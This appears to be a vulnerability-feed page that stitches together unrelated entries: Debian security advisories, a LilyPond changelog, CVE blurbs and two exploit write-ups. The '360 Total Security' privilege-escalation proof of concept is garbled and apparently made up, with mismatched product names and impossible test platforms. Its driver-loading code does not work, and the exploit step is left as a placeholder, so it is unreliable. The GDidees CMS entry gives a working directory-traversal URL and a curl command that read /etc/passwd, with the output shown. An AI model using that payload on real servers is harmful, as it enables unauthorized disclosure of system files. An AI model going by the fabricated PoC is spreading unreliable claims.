Buffer Overflow vulnerability in Qihoo 360 Safe guard v12.1.0.1004, v12.1.0.1005, v13.1.0.1001 allows attacker to escalate priveleges.

1.  \# Exploit Title: 360 Total Security 10.8.0.1213 Local Privilege Escalation
    
2.  \# Google Dork: N/A
    
3.  \# Date: 2021-05-11
    
4.  \# Exploit Author: youtube.com/@memorycorruptor
    
5.  \# Vendor Homepage: http://www.360totalsecurity.com/
    
6.  \# Version: 360 Total Security 10.8.0.1213
    
7.  \# Tested on: Windows x64 / Linux Debian x64 / MacOS
    
8.  \# CVE: CVE-2021-33973
    
9.  \# PoC Video: https://www.youtube.com/@memorycorruptor/videos
    
10.  \# Description: https://memorycorruptor.blogspot.com/p/vulnerabilities-disclosures.html
    
11.  \---------------------------------------------------------------------------
    
12.  Elevation of Privilege (EOP) Vulnerability in 360 Total Security 10.8.0.1213
    

14.  A Local Privilege Escalation vulnerability in 360 Total Security 10.8.0.1213, which allows the antivirus software to execute actions with system-level privileges while running under standard user privileges, The vulnerability is similar to a Windows kernel vulnerability discovered in 2021.
    

16.  Introduction
    
17.  360 Total Security 10.8.0.1213 is an antivirus software that provides protection against various threats. A recently discovered LPE/EOP vulnerability in the software allows it to perform actions with system-level privileges while running under standard user privileges. This article analyzes this vulnerability and provides a PoC to demonstrate the exploit.
    

19.  Vulnerability
    
20.  The LPE/EOP vulnerability in 360 Total Security 10.8.0.1213 is similar to a Windows kernel vulnerability discovered in 2021. It allows the antivirus software to perform actions with system-level privileges, bypassing the usual security checks in Windows. This can lead to unauthorized access, data theft, or other malicious actions.
    

22.  Proof of Concept
    

24.  #include <Windows.h>
    
25.  #include <stdio.h>
    

27.  int main() {
    
28.  // Load the vulnerable driver
    
29.  HMODULE hDriver = LoadLibrary("360TotalSecurity.sys");
    
30.  if (!hDriver) {
    
31.  printf("Failed to load driver: %d\\n", GetLastError());
    
32.  return 1;
    
33.  }
    

35.  // Get address
    
36.  FARPROC pVulnFunc = GetProcAddress(hDriver, "VulnerableFunction");
    
37.  if (!pVulnFunc) {
    
38.  printf("Failed to get function address: %d\\n", GetLastError());
    
39.  FreeLibrary(hDriver);
    
40.  return 1;
    
41.  }
    

43.  // Exploit code
    

45.  pVulnFunc(/\* Crafted argument \*/);
    

48.  FreeLibrary(hDriver);
    
49.  return 0;
    
50.  }
    

52.  the vulnerable driver (360TotalSecurity.sys) and retrieves the address of the vulnerable function. The exploit code should be placed where indicated, and the vulnerable function should be called with a crafted argument to trigger the LPE/EOP vulnerability.
    
53.  \---------------------------------------------------------------------------

CVE-2021-33973: CVE-2021-33973 - Pastebin.com

Debian Linux Security Advisory 5390-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5390-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffApril 16, 2023                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2023-2033Debian Bug     : 1034406Multiple security issues were discovered in Chromium, which could resultin the execution of arbitrary code.For the stable distribution (bullseye), this problem has been fixed inversion 112.0.5615.121-1~deb11u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmQ8MnEACgkQEMKTtsN8TjaGfhAAiJWqYWW3KO7l2i4JBe+vne7rZdEoCMsC7HxhDBbvSBs3sd0bFCUsGTdKqbPcc1l8dX49jcyxF+Fl7y+P/HvvsZ1fb1te5yvbcvVoe1RR+6GQ45Os33eWSVJZsGZ2AHjlHsej2/srOGPcDPOjHv1AgnCIHtJ2OK5MOPWbvyCfRl0T75Whge3XxQGz/KnnYnwQU1bZGT74j8U1FkVDpxeDN+nBah9IElRBCOg2Jkz840tPcftaZdUtQKH2upOg14At/IhqImiYc4HqbsHBSWFHstraskAFK/smXHEYPa2tdBVcLpqjOR9zHRfPpLPPM4yeu8OsU3Sr3YqzZL+xrA/DitENHcDwgkKzNJOHbFXUVX2/nEtrTSG80l+LjFzr4H1N5t6jgPTQf4AQmSjHKAKeVkYooNL2iFV8vfn0LcHgc7AXwGCADQC7hHzAhZaoX9e3Gkjhh9wo1D77zUGC4WcW3kQQXlA4BecfabBN3L+cFJMQPQKf9mOgt3lb2gJzB8cXe1z4PpnQ3JD1X7dkjy+ukpbfyxrFU3WYOPffXyHJ6hqtcYQSG/ktaIZ1RJmB1fI89g9k8/rDaFs4/0GfEA9ZCbKLhFX3FhNNkwkVoBwcbatZiizpDX3wrW3awgk+KKZHE7etFEavqSjaP96cQ3UvvxMd/8NvlkIpz9EgzLy/E74=gB3H-----END PGP SIGNATURE-----

Debian Security Advisory 5390-1

Debian Linux Security Advisory 5389-1 - Two vulnerabilities were discovered in rails, the Ruby based server-side MVC web application framework, which could lead to XSS and DOM based cross-site scripting (CRS). This update also fixes a regression introduced in previous update that may block certain access for apps using development environment.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5389-1                   security@debian.orghttps://www.debian.org/security/                                  Aron XuApril 14, 2023                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : railsCVE ID         : CVE-2023-23913 CVE-2023-28120Debian Bug     : 1033262 1033263Brief introduction Two vulnerabilities were discovered in rails, the Ruby based server-sideMVC web application framework, which could lead to XSS and DOM basedcross-site scripting (CRS).This update also fixes a regression introduced in previous update thatmay block certain access for apps using development environment.For the stable distribution (bullseye), these problems have been fixed inversion 2:6.0.3.7+dfsg-2+deb11u2.We recommend that you upgrade your rails packages.For the detailed security status of rails please refer toits security tracker page at:https://security-tracker.debian.org/tracker/railsFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQEzBAEBCAAdFiEEhhz+aYQl/Bp4OTA7O1LKKgqv2VQFAmQ5gEQACgkQO1LKKgqv2VT/iwgAvAA/wob57s9L6OseUHQL9E83qcGgmyukO5rPg0v+DSJXNWZP76ntGemfHQPeD73OqjBymt9JBSkI7ZGqDA8VvqR/5TvXF4IUlVyQ7CQ7DEHcJJVDcMH4MVIKzgl6mGk3eeqZf1e2TmV5+NUkLcOEi8JPlcnA8umue6GiGMOVpee6h57omEJjLrbIWuZc5z4+OEX1PVCgEVVbfsgxY8R43Eu6+3RPciYHkuo/spY6sdqFGWojvVEM25qZ49Nae4JcUFmK1VWprzZstrlSCaXVmiBQ/grUtHXyMd5jGSHVh7XFdl98ggKasUiUSS3cOqNJS9WzFK6oLORMXfI4iIklNQ===FKaG-----END PGP SIGNATURE-----

Debian Security Advisory 5389-1

GDidees CMS version 3.9.1 suffers from file disclosure and directory traversal vulnerabilities.

    # Exploit Title: GDidees CMS - 'imgdownload.php' Local File Disclosure# Date : 03/27/2023# Exploit Author : Hadi Mene# Vendor Homepage : https://www.gdidees.eu/# Software Link : https://www.gdidees.eu/cms-1-0.html# Version : 3.9.1 and earlier # Tested on : Debian 11 # CVE : CVE-2023-27179### Summary:GDidees CMS v3.9.1 and lower versions was discovered to contain an local file disclosure vulnerability via the filename parameter at /_admin/imgdownload.php.### Description :Imgdownload.php is mainly used by the QR code generation module to download an QR code. The vulnerability occurs in line 4 where the filename parameter which will be opened later is not filtered or sanitized.Furthermore, there is no admin session check in this code as it should since only the admin user should normallybe able to download QR code.Vulnerable Code :3. if (isset($_GET["filename"])) {4.        $filename=$_GET["filename"];    .....          .....27. @readfile($filename) OR die();### POC :URL : https://[GDIDEESROOT]/_admin/imgdownload.php?filename=../../../../../../etc/passwdExploitation using curl # curl http://192.168.0.32/cmsgdidees3.9.1-mysqli/_admin/imgdownload.php?filename=../../../../../etc/passwdroot:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologinbin:x:2:2:bin:/bin:/usr/sbin/nologinsys:x:3:3:sys:/dev:/usr/sbin/nologinsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/usr/sbin/nologinman:x:6:12:man:/var/cache/man:/usr/sbin/nologinlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologinmail:x:8:8:mail:/var/mail:/usr/sbin/nologinnews:x:9:9:news:/var/spool/news:/usr/sbin/nologinuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologinproxy:x:13:13:proxy:/bin:/usr/sbin/nologinwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologinbackup:x:34:34:backup:/var/backups:/usr/sbin/nologinlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologinirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologingnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologinnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin_apt:x:100:65534::/nonexistent:/usr/sbin/nologinsystemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologinsystemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologinsystemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologinntp:x:104:110::/nonexistent:/usr/sbin/nologinmessagebus:x:105:111::/nonexistent:/usr/sbin/nologinuuidd:x:106:112::/run/uuidd:/usr/sbin/nologinpulse:x:107:115:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologinlightdm:x:108:117:Light Display Manager:/var/lib/lightdm:/bin/falsehadi:x:1000:1000:hadi,,,:/home/hadi:/bin/bashsystemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologinvboxadd:x:998:1::/var/run/vboxadd:/bin/falseopenldap:x:109:118:OpenLDAP Server Account,,,:/var/lib/ldap:/bin/falsesshd:x:110:65534::/run/sshd:/usr/sbin/nologinmysql:x:111:120:MySQL Server,,,:/nonexistent:/bin/false### References:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27179https://nvd.nist.gov/vuln/detail/CVE-2023-27179https://www.exploit-db.com/papers/12883

GDidees CMS 3.9.1 Local File Disclosure / Directory Traversal

LilyPond before 2.24 allows attackers to bypass the -dsafe protection mechanism via output-def-lookup or output-def-scope, as demonstrated by dangerous Scheme code in a .ly file that causes arbitrary code execution during conversion to a different file format. NOTE: in 2.24 and later versions, safe mode is removed, and the product no longer tries to block code execution when external files are used.

\-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Format: 1.8
Date: Sat, 21 Aug 2021 06:22:22 -0600
Source: lilypond
Architecture: source
Version: 2.22.1-1
Distribution: unstable
Urgency: medium
Maintainer: Anthony Fok <foka@debian.org>
Changed-By: Anthony Fok <foka@debian.org>
Changes:
 lilypond (2.22.1-1) unstable; urgency=medium
 .
   \* New upstream version 2.22.1
   \* Bump Standards-Version to 4.6.0 (no change)
   \* Mark lilypond-{doc-pdf,fonts} "Multi-Arch: foreign"
   \* Drop previously backported upstream patches
   \* Mark Lilypond as insecure for externally fetched data files
     in the new README.Debian.security file kindly provided by
     fellow Debian Developer and security expert Moritz Mühlenhoff
Checksums-Sha1:
 7f5f22c1bd9b04f7a3e14ba92f1ffb7fdde0a575 4500 lilypond\_2.22.1-1.dsc
 13b37383e69d96123630fc7519af4cd8b0feadb0 2510038 lilypond\_2.22.1.orig-guile18.tar.gz
 a79c28f1f9956c756df357ef4ab7051131881cf2 18033161 lilypond\_2.22.1.orig.tar.gz
 6702433bc81923f4100613905bc07a85d8f17d88 80540 lilypond\_2.22.1-1.debian.tar.xz
 7a14c6250e647a2b5267b50e7682515d4ff234ee 22633 lilypond\_2.22.1-1\_amd64.buildinfo
Checksums-Sha256:
 4a1be7cbda2b1190456f0eb1eff3f17d536a4eb6e855dc02031a8627ed8fa4f8 4500 lilypond\_2.22.1-1.dsc
 55ff45dd426c58ef7a5530b4e701c2a6a1e54043c2b69c64206fc105ddd247db 2510038 lilypond\_2.22.1.orig-guile18.tar.gz
 72ac2d54c310c3141c0b782d4e0bef9002d5519cf46632759b1f03ef6969cc30 18033161 lilypond\_2.22.1.orig.tar.gz
 681159939704995506ad31d0898536364faa767c815558809d7e37e94cabf003 80540 lilypond\_2.22.1-1.debian.tar.xz
 b9d7b226188769c0c5acaed1358e58c80eb3a9e52f539d99077f07ee08b72bd7 22633 lilypond\_2.22.1-1\_amd64.buildinfo
Files:
 6e1c5a49d2f78da2a212a3e9b6aa4770 4500 tex optional lilypond\_2.22.1-1.dsc
 2863f46023dd38e33ac37978302c078f 2510038 tex optional lilypond\_2.22.1.orig-guile18.tar.gz
 07321f2d9dc45d2f14d5057609184aae 18033161 tex optional lilypond\_2.22.1.orig.tar.gz
 c4bf1e7f7d7678babd654e5ab7ce38fe 80540 tex optional lilypond\_2.22.1-1.debian.tar.xz
 4816ce4ba492da1a0b5fccead28a793f 22633 tex optional lilypond\_2.22.1-1\_amd64.buildinfo

-----BEGIN PGP SIGNATURE-----

iQJEBAEBCAAuFiEEFCQhsZrUqVmW+VBy6iUAtBLFms8FAmEhOnIQHGZva2FAZGVi
aWFuLm9yZwAKCRDqJQC0EsWaz6b4EACs5L0e594aTv0H0g+tlnVdxJf0H6UUN58L
08zQK4w/ySdvFsPxi7yulTosxVASZNhMM6KwDN24j/gqF+627g1QFLVTE852Zs8W
G9dxKXaAU+yppj5+vTFmJbT/+zFM3+LpCf5gsKj3q6uOK+8WBeX4hEKfIlnr5oJc
VmmPNOnbmSFzJ+N5RgcqSyydeZVfl5fG3z9r42MTWjDp6XkILmXSJM5gp9Dw0Ri1
3oWHFH5CWjJRLKk2o2HMBN2C08wSsJ1fEBYPXbjEurMAcZTaF2Zrqo7A/wO8Op2+
6od4R/2yaZkiwsDABH1jXSCD1pPLO2ts003TKlXMNReSD7NfqtMsj47XddERgznf
2Nzohvcgdcjhah9WeneGEbqn72oZxkvyWT7OIjBpwxMxXKSJWLgFWXwNredyKtNS
gpaUqW69W49awRSraKY3vXvSSaBgXam4+/xwTp+VevmRJEtNJffBsTJdJVx0nF+Q
j+suEpPzAmdG7v6KqdEkoNMRnCNQQCnZ/e4Ar82iDbiCztMfOaohl8CGQVXC3Pxb
kxLfYKwv0HtHoBrQA5hHVB0y03YhzMzepTDi9vSs+i9uaBTE7SlD/Sw/BPt+CTpU
iwqEEcZ79n/3pcefRZaBHx9XAnx/Mfg5+4FxyDZ0cxRtWvY3znLlHU7KfcCkkY0r
2emmKId2LA==
=h3FA
-----END PGP SIGNATURE-----

CVE-2020-17354: Debian Package Tracker

Debian Linux Security Advisory 5388-1 - It was reported that HAProxy, a fast and reliable load balancing reverse proxy, does not properly initialize connection buffers when encoding the FCGI_BEGIN_REQUEST record. A remote attacker can take advantage of this flaw to cause an information leak.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5388-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoApril 13, 2023                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : haproxyCVE ID         : CVE-2023-0836It was reported that HAProxy, a fast and reliable load balancing reverseproxy, does not properly initialize connection buffers when encoding theFCGI_BEGIN_REQUEST record. A remote attacker can take advantage of thisflaw to cause an information leak.For the stable distribution (bullseye), this problem has been fixed inversion 2.2.9-2+deb11u5.We recommend that you upgrade your haproxy packages.For the detailed security status of haproxy please refer to its securitytracker page at:https://security-tracker.debian.org/tracker/haproxyFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmQ4YxlfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0RA+g/8C9B17OgAEYmOivNLX/0SmHC0WQft66LH5a3lrr+xgncSO6h7REzVlgMXIffI+RnTxTuHH0sMb8S1rYsAfaHeAHGzXOEKiooPVwMix3TMTR6mocv5D1V4smTiI8JWZSDIzPLKn1EYKQDXxg8wz6nEVsc5njF8SAcWZ1fDDLgbbVtUEY9SL2dkGLF+QlsGWnsseN6AzNfVm7vYIdTzSFbc1Hd3mnlL+uIolhKkGLtQ+iMTLxWjxu1n4MqIYh3VR/f2BUVez9JP3GZ/BOEZU/M3b91QYjmY2OghAlNBBXlL/jMmbZAAAfFukIK1JIb23iLac/bjv6e8yixwLX0q+t0j4ZTpxmln+iiIPLSZ/1IBYXOvf6nrP/cIueGqwlMFdD6qRm7s8cIsx4Gw8bb+ge9zUCOdkX0uPzLDRWul3e+69fdmWazcmDXIFOrgBcp5cp4i33r0+T338rimyN4Q6CyqYQ756gf5mK8kq/vVLI4qyLYmVjZj2eAUI6EPWptxP0UKUarFtpYsc2XRRFb66bxaRTf1yuPvR3aRJKnBW4+KnuiTho1J5wa/HaK551NWwbgmICsbGsfI5/S0cHpYcvdSRG5SAZavFGUT/dIlsOD4OdjevHGnN021AYP1+EqLuX8Zsq5DQKh3s/yUsl6svTTBOiXZxVer9DLYD+D4yuqkqIc=6SUU-----END PGP SIGNATURE-----

Debian Security Advisory 5388-1

Debian Linux Security Advisory 5387-1 - David Marchard discovered that Open vSwitch, a software-based Ethernet virtual switch, is susceptible to denial of service via malformed IP packets.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5387-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffApril 13, 2023                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : openvswitchCVE ID         : CVE-2023-1668Debian Bug     : 1034042David Marchard discovered that Open vSwitch, a software-based Ethernetvirtual switch, is suspectible to denial of service via malformed IPpackets.For the stable distribution (bullseye), this problem has been fixed inversion 2.15.0+ds1-2+deb11u4.We recommend that you upgrade your openvswitch packages.For the detailed security status of openvswitch please refer toits security tracker page at:https://security-tracker.debian.org/tracker/openvswitchFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmQ4TY8ACgkQEMKTtsN8TjZbyRAAsrzNlczYAYlZQtb4iT8qZxHT0VVUwcxoWL7ejlNblGU2WrSFoEdmnqvpE6wy30DL0OhsRd/hmGuwIKfgkuAwQRZzu7+DHIsRfCQvqiQLtS6EUkVz2v/mEARIROSlGvCKg24hGrnN/BecyWem9hR1iK/o5heWm7CmTFF9Lv9cFUWEBwXNR9a8DtP/lM9neqX+VDpB33+N0u1jT4BmR0JyG47GyTzNNPoVrYsaRhpyLOIScXFXiuC5Z4J/pepOKDcIEDTgqfD1l7Z2Yr+L2CUiO0lx6KjSoBw5x4YJYmiLwdA7LdtBKVh0X/zsqBMPpP07Z/wtx6CXmH49KEfuIB4Peai/YBgUeVgq/p5Id7Ztmok+BtURlE0mCQVqh/iUc3G71tFZW7Epa7BxCqb/r0ORElTmZpkyi469qvcJDu0RVXp6UzFnYJYJ1IBYifiErzixy1i8j/7vcBzhOIWr3jcSVhjHLWx4U1a/3wIkDjKoUfgKtAlQddy60hO3YJFtevgqofFDaetCK/HlSqoPjOJ0Jcb8AowTuWtWCUE/Dd3ohfWNrjx6kk10ynsVgzbyMqlLx0P6gyEwGlWdmHmLDZ2F8vEjQ7Bmqc8vFs87RyWdfBTFHKvGXjN2dldzK5g7oSh2M+Ln1LrGTRsSMBJS7eFTqVAl1HLxpXEiNBzliJKBx0g=Gmnz-----END PGP SIGNATURE-----

Debian Security Advisory 5387-1

Debian Linux Security Advisory 5386-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5386-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffApril 12, 2023                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2023-1810 CVE-2023-1811 CVE-2023-1812 CVE-2023-1813                 CVE-2023-1814 CVE-2023-1815 CVE-2023-1816 CVE-2023-1817                 CVE-2023-1818 CVE-2023-1819 CVE-2023-1820 CVE-2023-1821                 CVE-2023-1822 CVE-2023-1823Multiple security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the stable distribution (bullseye), these problems have been fixed inversion 112.0.5615.49-2~deb11u2.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmQ27IkACgkQEMKTtsN8TjZJnRAAmqQ2oitZ8Xe6N7LFmTq9sADGRMIpupykpRNnPRItA6tVGyDK/yfZnURzD3PTe3uvNx+W8GY+cam3PVjVrPBOXBIga+0NX7krtrs/yIsdKPw0M5EuMiAIl/zwAdoPb8joxdgXMcdDU778iGrx7F0U8/L2cznVSxPP/KZLdEVu35ZoIPxNmH1AmOI91qWoraFdCbLutmtqwTDBwbq+Mk2uzGLlYAhhjEettIArw61unBpi6fMWoCDRSRvIHdXpQWya6WN0MfrUWgtWtQCoqIjyixCOhGVOxYoDrVzJNFDfKZ50eHCwwQxFQPTeK4xk4XBqrh7FnByEAURtZ9dgn3jRdAKZbKsaRQcCYRtGRkbllYD6jYoRTAru+L6b5BKiOL2HZ9Degy53JLNbc92yHpUMnn8oX3AKJM/GKmd053DJkLBP4eVfjh+EyR5cdI4m/pl8zhhQCqt9f7iKoCQPeJe2egMDVg0+Jf1o4oP5117sazBTmsx5yNcsBKHa4jhCUcNxan+7BeRM11edcKkNLDlq/YNC7+ZsqqR6Fps1/rLTgQ0L0LqW2OuEfKfUrfOd9B4G/uWHlYzQepxLy+AcUYnoCekFBHZJ+jtlkwVQ2PBgJ7crSGSWrbfjq0M1NSb9iOlchyINbnvkY3s+YDU0IZcOJqt5lNCrQ0paysYt/+pv994=9/cQ-----END PGP SIGNATURE-----

Debian Security Advisory 5386-1

Debian Linux Security Advisory 5385-1 - Multiple security issues have been found in the Mozilla Firefox web browser, which could potentially result in the execution of arbitrary code or spoofing.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5385-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
April 12, 2023                        https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : firefox-esr  
CVE ID         : CVE-2023-1945 CVE-2023-29533 CVE-2023-29535 CVE-2023-29536  
                 CVE-2023-29539 CVE-2023-29541 CVE-2023-29548 CVE-2023-29550  
Debian Bug     : 982794

Multiple security issues have been found in the Mozilla Firefox  
web browser, which could potentially result in the execution  
of arbitrary code or spoofing.

For the stable distribution (bullseye), these problems have been fixed in  
version 102.10.0esr-1~deb11u1.

We recommend that you upgrade your firefox-esr packages.

For the detailed security status of firefox-esr please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/firefox-esr

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmQ28JsACgkQEMKTtsN8  
TjbdRg/8DSoN4DTk+CAuIooGwX0fON/G7DgsrGR+dFwQEBd/PMf7Hy+A9EpjOO7E  
IeXK4XHNOV8qbAx3wQ3E9R6oZT//rvgXjYbiNY717OUkK1D7C5QJEinJsY57J2WX  
TW4Q27RuPVVft9sCsKkq47yQE+XT11Z7FuQ+L8xOSZ8+adfvhKhrlZGtzSd9Olux  
1XNmYgJGXu0IEzm5lqWzu+zvraY/yZbOFMStdu3t/tF+jIA2O6v25E2xczObOepv  
TbynApqS1YAH7qlbvjE31qZ3J0mTWhPLtdo6OBKucpc1KBRuSJYcC5sUoGZ5dFrl  
5+K3YfOlPjTww94mx1Own1WDyNw+g37lEGt5enQ/EkWSVKK4co/pzCvzmc7xxzr9  
64ukerv/C94KjSdmPPr6kr4qjUJThs/XlFTbhbPvRRL0Blk/fIJuG1dALXk2R2Ut  
4La0T9h0tGoEoLDGoI1A/cKl2cLnpGg0LeLxWhMysVcYSFcza/0EfYmGtDbRp5iv  
bB+vlpYjjWaNyx+ZtxDtbPtZ9ZmTOKPjrQ+bJFAEYqykIAlueC3bBwqpMz5SxPqg  
NDxWoGK13S//9Ug3c/GPcxNNiV1jNPxuG9Dy3Kq1/LHKrDtnYOfjXrg7nqelRSHS  
1NVzxuTD/0lV8tlo/806hoZToxINqi+c13/Nm5GnDiMzdg3u/hQ=RuqS  
-----END PGP SIGNATURE-----

Debian Security Advisory 5385-1

TightVNC before v2.8.75 allows attackers to escalate privileges on the host operating system via replacing legitimate files with crafted files when executing a file transfer. This is due to the fact that TightVNC runs in the backend as a high-privileges account.

Tag

#debian